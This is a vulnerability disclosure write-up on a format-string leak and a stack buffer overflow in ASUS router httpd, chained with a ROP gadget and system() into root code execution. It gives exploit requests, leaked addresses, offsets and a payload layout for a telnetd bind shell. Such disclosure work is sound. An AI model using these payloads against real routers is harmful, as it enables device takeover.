ASUSWRT RCE via Buffer Overflow, ASLR Bypass

A detailed look at the memory corruption/disclosure bugs ISE exploited in ASUS routers

In our previous article on the RT-AC3200 router, we briefly described a stack-based buffer overflow (CVE-2018-14712) and an uncontrolled format string (CVE-2018-14713) that can be combined for reliable remote code execution as root. The device in question uses the 32-bit ARMv7 architecture and runs version 2.6.36 of the Linux kernel, with DEP and ASLR enabled. In this post, we will discuss both flaws in detail and provide a proof-of-concept exploit that should work out of the box against any router running ASUSWRT 3.0.0.4.382.50010 (only slight modifications are necessary to port it to other vulnerable versions).

To temper expectations, it is important to mention the significant limitations to these vulnerabilities. Unless the target device has remote administration enabled, this attack is only exploitable on the LAN side. It also requires authentication to conduct. With widespread use of default credentials and unencrypted HTTP, the latter may not be a particularly high barrier for an attacker on the network, but anyone with a valid password can already upload backdoored firmware to produce the same results. The motivation for discussing these bugs primarily comes from technical interest in them, rather than their potential as a vector in real-world attacks.

The Target: httpd

ASUSWRT includes a tiny, custom HTTP server for web administration, referred to as httpd (not Apache). Since httpd is released under the GPL, ASUS has made the full source code available to those who inquire. Access to source was a highly valuable asset for this assessment; both vulnerabilities in this article were identified just by reading the code.

The server is written in C and dates back to 1999, based on file header comments. Basically, only two files are necessary to look at to gain a fairly complete understanding of the program: httpd.c and web.c. httpd.c contains all the high-level parsing functions that separate a request into its various components, like the target, headers, and body. These routines make great candidates for fuzzing, which I briefly attempted but stopped when American Fuzzy Lop (AFL) was only able to find a buffer overflow disclosed a month prior (CVE-2018-8879). Were I to assess another ASUS device, I would definitely come up with a more systematic fuzzing methodology.

Those “unique” crashes? All one bug that was already reported and fixed.

On the other hand, the code in web.c is responsible for more ASUS router-specific request processing. In particular, it exposes a remote procedure call (RPC) endpoint at /appGet.cgi that accepts a number of hooks, each corresponding to a different function in the file. These handlers are the gateway to most of the server’s attack surface, since they rely heavily on user-supplied parameters, sometimes passing them to functions in shared libraries for granular processing. I focused most of my attention on the request handlers in web.c for this reason.

When Format Strings Go Wrong

While perusing the source, one thing that stood out to me was the prevalence of a macro called websWrite() , used by request handlers to write response data back to the client. It’s defined as follows:

#define websWrite(wp, fmt, args…) ({ int TMPVAR = fprintf(wp, fmt, ## args); fflush(wp); TMPVAR; })

In case the code above is unclear, using the macro is equivalent to writing data to a FILE pointer, in this case that of an HTTP connection, with fprintf() . That seems innocuous enough, but there’s the potential for an easily-overlooked vulnerability: an uncontrolled format string.

Here’s how that can arise. For each specifier in a given format string, fprintf() and its sibling functions expect corresponding arguments for the data to write. The ARM calling convention places a function’s first three arguments in registers r0, r1, r2, and r3, and the rest on the program’s call stack. In this case, the FILE stream and format string inhabit r0 and r1 respectively, so fprintf() will read the specifier arguments from r2, r3, and the stack.

Even if the calling code did not provide an argument for a specifier, fprintf() -style functions will still try to access it where it should be. The consequence? If the router developers made a mistake and passed any user-supplied input as the format string to websWrite() , an attacker could include specifiers like %x to read an arbitrary number of bytes off the stack. Since websWrite() is found so often throughout the source, it’s reasonable to expect at least one such blunder. Under this assumption, I wrote a quick regular expression to catch any obvious instances of format string bugs:

websWrite\(\w+, [^"]+[^)]+

This pattern will match calls to websWrite() that don’t pass a string literal for the second argument, a decent indicator that a variable, perhaps attacker-controlled, is used instead. After running the search and ruling out a few false positives, I was left with several functions registered as request handlers in web.c, all beginning with ej_nvram_match . Here’s the first of them — line 19 contains the suspicious macro usage.

Uncontrolled format string in ej_nvram_match(), line 19

This function and its siblings comprise a family of hooks for testing key-value entries in the router’s NVRAM storage. They take at least three parameters: a key, a value, and a string to return to the client if there is a binding between them. The important part: when writing the output string, httpd passes it as the second argument to websWrite() , i.e. as the format string to fprintf() .

One only needs to make an authenticated nvram_match request with the output parameter set to a format string to see that this is a real vulnerability. In the request below, %25 is the URL-encoded form of a percent symbol, so the web server treats %25p as %p .

GET /appGet.cgi?hook=nvram_match("wan_proto","dhcp","%25p,%25p,%25p,%25p") HTTP/1.1

Host: 192.168.1.11

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36

Cookie: asus_token=S5YM7kw9Q2wxkUb9k1xTrkxqOeYy3ns

The server’s response leaves no doubt as to the validity of this issue. The body is a JSON-esque payload with our format string interpreted and filled with interesting hexadecimal data:

HTTP/1.0 200 Ok

Server: httpd/2.0

x-frame-options: SAMEORIGIN

x-xss-protection: 1; mode=block

Date: Mon, 12 Nov 2018 15:38:49 GMT

Cache-Control: no-cache

Pragma: no-cache

Expires: 0

Content-Type: text/html

Connection: close {

"nvram_match-wan_proto":0x3,0x7eac9a80,0x7eac9a88,0x7eac9a84

}

The response includes four hex values, one for each format specifier we provided. Due to the calling convention, the first pair of pointers is from registers r2 and r3. The next pair comes right off the stack.

Being able to disclose memory contents is a serious vulnerability in and of itself, but it’s worth noting that format string attacks can be even more dangerous under certain conditions. Using the %n specifier, we can also write bytes to arbitrary memory locations if we control any data near the top of the stack (we do). This is one way to achieve code execution via uncontrolled format strings alone. At the time of discovery, I was aware of this possibility but decided to first explore web.c further, which leads us to the next issue I identified.

Overflowing The Pool

The function ej_delete_sharedfolder() is another RPC handler defined in web.c. It corresponds to the delete_sharedfolder hook, which takes two URL parameters: pool and folder . After verifying that both values are non-empty strings, the handler passes pool to the function get_mount_path() in the libdisk shared library, the source for which is also available to us in the ASUS GPL release. get_mount_path() is essentially a wrapper for another function, read_mount_data() :

Buffer overflow vulnerability in read_mount_data(), line 24

The vulnerability occurs on line 24 in the snippet above. Here, device_name refers to the pool string passed from get_mount_path() and ej_delete_sharedfolder() . The function uses sprintf() to copy this arbitrary-length value into a local buffer of size 8 ( target ) without any bounds checking. Since this buffer is stack-allocated, it should be possible for an attacker to overwrite the function’s return address with a long enough value of pool .

We can examine httpd in a debugger to confirm this. For the sake of having an ARM toolchain at hand, I copied over the server binary and its shared libraries to my Raspberry Pi 2 Model B. It’s the same architecture as the RT-AC3200, so the original executable runs without any extra work. I then ran httpd in GDB, set a breakpoint on the first sprintf() call within read_mount_data() , and issued a GET request for the following path with a 50-character pool string:

/appGet.cgi?hook=delete_sharedfolder()&folder=A&pool=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Once the breakpoint triggered, I stepped in and out of sprintf() and examined the current stack frame. GDB reported the saved PC for read_mount_data() as 0x41414140, which is essentially the 0x41414141 of ARM exploitation. As suspected, the function had clobbered its return address by copying my long pool value into the target buffer. Further testing revealed this overwriting occurs at 48 characters of pool data.

Achieving the coveted pc = 0x41414140

With this vulnerability, we have a simple way to direct the control flow of httpd to any address we want. This ability is at the heart of any code execution attack based on memory corruption. However, the RT-AC3200 employs at least two exploit mitigation techniques that make real-world exploitation somewhat more involved:

Executable space protection/DEP/NX Bit

The NX bit is a CPU feature that modern operating systems use to mark the stack and heap as non-executable regions, a policy known variously as executable space protection or Data Execution Prevention (DEP). This countermeasure thwarts the original stack smashing attack, which relies on the stack being both writable and executable. However, we can trivially defeat DEP by using a method known as return-to-libc. Instead of jumping to shellcode on the stack, we can jump to an existing function in the text segment or shared libraries. Since these areas have to be executable for the program to work, there’s nothing DEP can do to prevent this.

The most popular existing function to exploit is system() , since it lets us run complex shell commands and comes linked with most programs. The precondition to exploitation, then, is determining where in the address space system() lives.

Address Space Layout Randomization (ASLR)

As the name suggests, ASLR randomizes the positions at which memory segments are loaded to make it difficult for an attacker to predict where potentially useful code and data lie in the address space. For the RT-AC3200, all sections are randomized, including the stack, heap, text segment, and shared libraries. We can’t simply jump to system() since its address is unpredictable between every run of the program.

But ASLR is far from bulletproof. If we can leak information from the program’s memory, such as pointers saved on the stack, we can use basic arithmetic to infer the locations of key sections in the process. While ASLR ensures the absolute addresses of functions change between repeated runs of a program, their locations remain fixed relative to one another. An attacker with a copy of the target binary can perform dynamic analysis to determine the offset of system() relative to the address of something in libc that was leaked from the call stack.

This is where the format string vulnerability we found comes into play. If we keep reading pointers from the stack until we hit something close to the C standard library, we can subtract it from the address of system() to find an offset that should work every time.

ROPing to libc?

For our attack to work, we at least need addresses for system() and our command string on the stack. If the target were an x86 system, that would be enough. But this router is ARM, and the calling convention requires that r0 contain the argument to system() . We don’t directly control this register, but there’s a way to move contents from the stack, which we do control, into r0: a return-oriented programming (ROP) gadget. This is just a set of executable instructions somewhere in memory that ends by restoring the saved program counter, i.e. returning.

All we need is a single gadget of the form pop {r0, [...], pc} . For more complicated ROP chains, there are plenty of advanced gadget finding tools out there, but objdump | grep works just as well for something basic like this. There turns out to be a suitable instruction in libpthread, specifically at __pthread_alt_lock + 108 :

$ objdump -S libpthread.so.0 | grep -P -B5 -A2 "pop\t{r0[^}]*, pc}"

8ab8: e5843004 str r3, [r4, #4]

8abc: e1560003 cmp r6, r3

8ac0: 0a000001 beq 8acc <__pthread_alt_lock+0x6c>

8ac4: e1a00005 mov r0, r5

8ac8: ebffece8 bl 3e70 <__pthread_wait_for_restart_signal@plt>

8acc: e8bd807f pop {r0, r1, r2, r3, r4, r5, r6, pc} 00008ad0 <__pthread_alt_timedlock>:

You’ll notice this instruction also pops data into registers r1-r6. That’s perfectly fine, but it does mean we’ll have to add 24 bytes of padding after the command string in our final payload (to account for six 4-byte words).

Not So Random Anymore

We can use the format string leak and GDB to compute the offsets to all three required addresses: the ROP gadget in libpthread, system() in libc, and a command string that will end up on the stack. The first step is to search for pointers close to the shared libraries and stack using our nvram_match information leak. Ultimately, the goal is to find a reliable, fixed offset for each target address. For example, here are five pointers leaked during one run of the program:

{

"nvram_match-wan_proto":0x3,0x7effca00,0x7effca08,0x7effca04,0x76ce86fc

}

Compare to the addresses of system() and the gadget in GDB:

(gdb) p system

$3 = {<text variable, no debug info>} 0x76ceb0f4 <system>

(gdb) p __pthread_alt_lock + 108

$4 = (<text variable, no debug info> *) 0x76ceaacc <__pthread_alt_lock+108>

The last address in the leak, 0x76ce86fc, looks the closest to both of these targets; the offsets are 0x29f8 and 0x23d0 for system() and our gadget in __pthread_alt_lock , respectively. What about a point of reference for our command string? The second, third, and fourth pointers all refer to adjacent objects on the stack, so any one of them should work as a base address. I’m going to use the third one, since I found that to work on both my Pi and the actual router. But where the shell command itself ends up depends on the length of our final payload, which will take the following structure:

44 bytes of padding

Address of gadget (4 bytes)

Address of command string (4 bytes)

24 bytes of padding to fill up r1-r6 for the gadget

Address of system() (4 bytes)

(4 bytes) Command string (arbitrary length)

There are 80 bytes between the start of the payload and the start of the command. Knowing this, we can once again break on the first sprintf() call in read_mount_data() , provide a dummy payload to overflow the buffer (e.g. 'A'*80 + 'this is my test command' ), and examine the stack frame in GDB to determine where the string lies relative to our base address.

Locating our shell command on the stack

The command ends up at 0x7effa9d0, exactly 0x2038 bytes below the leaked base address (0x7effca08), giving us the final offset needed to build an exploit.

Putting It All Together

I ended up writing a Python script to automate the process of leaking information, computing offsets, and constructing the payload accordingly. My system() command starts a telnetd instance on port 1234 that offers a root shell.

A caveat: this exploit still isn’t 100% reliable. Since sprintf() only works on C-style strings, it will copy an incomplete payload into the buffer if there happens to be a null byte (0x00) in any of the calculated addresses. This will most likely cause the server to dereference an invalid memory location and crash. Fortunately, the router detects this and automatically restarts httpd, so you can just try again with the new addresses.

If all goes well, the script should print out the information leak and hang while telnetd runs on the target. You can safely press Ctrl+C and connect.

PoC to start a bind shell on port 1234

The Fix Is In

As one would expect, ASUS fixed the buffer overflow by calling snprintf() with the size of the destination array instead of plain sprintf() . This is how httpd formats string buffers in countless other locations and is the correct, uninteresting solution.

Strangely, though, ASUS didn’t patch the format string vulnerability by using a %s specifier. Their solution was to bail out whenever the supplied output parameter isn’t entirely alphanumeric, thereby preventing exploitation via percent symbols. They added this check for all given output strings in every hook of the nvram_match family — here’s an example from the changes merged into Asuswrt-Merlin:

ej_nvram_match* functions now check that the output string is alphanumeric

To the developers’ credit, I suspect they had reflected cross-site scripting attacks in mind when they implemented this mitigation, which would make it more reasonable. Still, the decision to leave the underlying mistake intact strikes me as another vulnerability just waiting to happen.

Takeaways